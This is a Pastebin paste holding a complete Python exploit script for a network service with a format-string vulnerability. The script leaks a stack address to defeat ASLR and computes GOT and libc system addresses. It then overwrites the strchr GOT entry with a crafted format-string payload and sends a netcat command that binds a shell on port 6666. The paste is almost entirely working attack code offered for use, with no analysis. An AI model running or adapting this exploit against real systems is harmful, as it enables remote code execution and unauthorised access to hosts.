Guest User

Untitled

a guest
Jul 27th, 2014
149
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. import socket
  3. from time import sleep
  4. import re
  5. from struct import pack
  6. import sys
  7.  
  8. # =========================================================================
  9. # formatstring vuln pattern generator
  10. # =========================================================================
  11. def address_to_bytes(bytestowrite, correctby):
  12.     tb = '%08X' % (bytestowrite)
  13.     ba = bytearray(tb.decode('hex')[::-1])
  14.     result = list()
  15.    
  16.     for i in range(len(ba)):
  17.         ba[i] -= correctby
  18.  
  19.     for i in range(len(ba)):
  20.         if not i:
  21.             result.append(0x100 + ba[i] - 16)
  22.         else:
  23.             result.append(0x100 + ba[i] - ba[i - 1])
  24.  
  25.     return result
  26.  
  27. def generate_formatstr_exploit(writetoaddress, bytestowrite, slot, correctby=0, padlen=0):
  28.     tbp = address_to_bytes(bytestowrite, correctby)
  29.     addrstr = ''
  30.     writestr = ''
  31.     for i in range(len(tbp)):
  32.         addrstr  += pack('<L', writetoaddress + i)
  33.         writestr += '%{0}x%{1}$n'.format(
  34.             str(tbp[i]),
  35.             str(slot + i)
  36.             )
  37.  
  38.     return addrstr + writestr + ''.join(('.') for i in range(padlen))
  39.  
  40. # =========================================================================
  41. #
  42. # =========================================================================
  43. def exploit(host, port):
  44.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  45.     s.connect((host, port))
  46.    
  47.     # username
  48.     s.recv(1024)   
  49.     s.send('%223$x'+'\n') # using the format string vuln to leak a binary address of the stack
  50.    
  51.     # password
  52.     s.recv(1024)
  53.     s.send('\n')
  54.    
  55.     # email
  56.     s.recv(1024)
  57.     s.send('\n')
  58.  
  59.     # message
  60.     resp = s.recv(1024).strip()
  61.     l = re.findall(r"'(.*?)'", resp)
  62.    
  63.     # calculate the current baseaddress
  64.     binbase = int(l[0], 16) - 0x00000584
  65.  
  66.     # calculate the got entry address of
  67.     # strchr from the binary base and the offset
  68.     got_plt_strchr = binbase + 0x00003bc8
  69.  
  70.     # calculate the address to libc system from the
  71.     # strchr entry(not the cleanest way)
  72.     __libc_system = (got_plt_strchr + 0xffe8ff58) & 0xffffffff
  73.  
  74.     print "baseaddress: %s got_plt_strchr: %s __libc_system: %s" % (hex(binbase), hex(got_plt_strchr), hex(__libc_system))
  75.  
  76.     # send yes to continue and stay in the same process
  77.     # and so the alsr doesnt re-base
  78.     s.recv(1024)
  79.     s.send('yes\n')
  80.  
  81.     # overwrite the got strchr entry to point to
  82.     # libc system
  83.     fs_payload = generate_formatstr_exploit(got_plt_strchr, __libc_system, 522, correctby=len("So your username is '"))
  84.  
  85.     # username
  86.     s.recv(1024)
  87.     s.send(fs_payload+'\n')
  88.  
  89.     # password
  90.     s.recv(1024)
  91.     s.send('\n')
  92.  
  93.     #email
  94.     s.recv(1024)
  95.     s.send('\n')
  96.  
  97.     # picked up by the last fgets call within get_string
  98.     # and used as first argument in the strchr(now system) call
  99.     s.recv(1024)
  100.     s.send('/bin/nc.traditional -lvp 6666 -e /bin/sh\x00\n')
  101.  
  102.     s.close()
  103.  
  104. exploit(sys.argv[1], int(sys.argv[2]))
RAW Paste Data